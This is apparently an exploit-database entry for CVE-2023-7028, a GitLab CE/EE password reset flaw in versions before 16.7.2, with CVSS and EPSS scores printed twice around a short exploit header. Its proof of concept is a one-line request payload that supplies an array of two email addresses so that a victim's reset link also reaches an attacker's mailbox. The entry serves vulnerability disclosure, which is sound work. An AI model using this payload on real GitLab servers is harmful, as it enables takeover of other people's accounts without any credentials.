Lucene search

K
zdt0xB4551337DAY-ID-39456
HistoryMar 14, 2024 - 12:00 a.m.

GitLab CE/EE < 16.7.2 - Password Reset Vulnerability

2024-03-1400:00:00
0xB455
0day.today
166
gitlab
password reset
vulnerability
exploit
sebastian kriesten
twitter
vendor homepage
disclosure
version
cve-2023-7028

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

7.2 High

AI Score

Confidence

Low

0.96 High

EPSS

Percentile

99.5%

# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset
# Exploit Author: Sebastian Kriesten (0xB455)
# Twitter: https://twitter.com/0xB455
# Vendor Homepage: gitlab.com
# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
# Version: <16.7.2, <16.6.4, <16.5.6
# CVE: CVE-2023-7028

Proof of Concept:
user[email][][email protected]&user[email][][email protected]

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

7.2 High

AI Score

Confidence

Low

0.96 High

EPSS

Percentile

99.5%